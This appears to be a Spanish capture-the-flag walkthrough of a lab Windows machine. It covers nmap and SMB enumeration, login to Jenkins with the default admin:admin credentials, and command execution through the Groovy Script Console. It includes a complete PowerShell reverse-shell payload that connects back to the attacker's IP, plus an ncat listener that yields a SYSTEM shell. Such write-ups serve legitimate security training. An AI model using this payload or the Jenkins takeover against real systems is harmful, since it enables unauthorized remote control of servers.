Identificamos la IP de la máquina víctima:
❯ arp-scan --interface=wlan0 --localnet | grep PCS | awk '{print $1}'
10.207.245.174Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 10.207.245.174
[sudo] contraseña para wh01s17:
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-09 00:27 -0300
Nmap scan report for 10.207.245.174
Host is up (0.00021s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5040/tcp open unknown
7680/tcp open pando-pub
8080/tcp open http-proxy
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
MAC Address: 08:00:27:EB:D8:BC (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 14.12 seconds❯ nmap -sCV -p 80,135,139,445,5040,7680,8080,49664,49665,49666,49667,49668,49669,49670 -oN 02-targeted.txt 10.207.245.174
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-09 01:12 -0300
Nmap scan report for 10.207.245.174
Host is up (0.00077s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
7680/tcp closed pando-pub
8080/tcp open http Jetty 12.0.19
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(12.0.19)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: BUILD, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:eb:d8:bc (Oracle VirtualBox virtual NIC)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-11-09T08:15:36
|_ start_date: N/A
|_clock-skew: 3h59m58s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.74 secondsEnumeramos el puerto 445, pero la sesión nula no nos permite listar recursos:
❯ netexec smb 10.207.245.174
SMB 10.207.245.174 445 BUILD [*] Windows 10 / Server 2019 Build 19041 x64 (name:BUILD) (domain:BUILD) (signing:False) (SMBv1:None)
❯ netexec smb 10.207.245.174 -u '' -p '' --shares
SMB 10.207.245.174 445 BUILD [*] Windows 10 / Server 2019 Build 19041 x64 (name:BUILD) (domain:BUILD) (signing:False) (SMBv1:None)
SMB 10.207.245.174 445 BUILD [-] BUILD\: STATUS_ACCESS_DENIED
SMB 10.207.245.174 445 BUILD [-] Error enumerating shares: Error occurs while reading from remote(104)El servicio Jetty del puerto 8080 resulta ser Jenkins. Accedemos a http://10.207.245.174:8080 y nos logueamos con las credenciales por defecto admin:admin.
En http://10.207.245.174:8080/manage/ encontramos la Consola de scripts (/manage/script), que permite ejecutar scripts Groovy (Jenkins Script Console RCE). Probamos la ejecución de comandos:
def comando = "cmd /c whoami"
def proceso = comando.execute()
proceso.waitFor()
println proceso.text
Salida: nt authority\systemConfirmamos que Jenkins corre como nt authority\system. Lanzamos una reverse shell de PowerShell:
def comando = 'powershell -NoP -NonI -W Hidden -Command "$client = New-Object System.Net.Sockets.TCPClient(\'10.207.245.35\',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"'
def process = comando.execute()
process.waitFor()
println "pwned!"
❯ ncat -nlvp 1234
Ncat: Version 7.98 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.207.245.174:60070.
PS C:\Program Files\Jenkins> whoami
nt authority\systemObtenemos una shell y las flags.
Fin.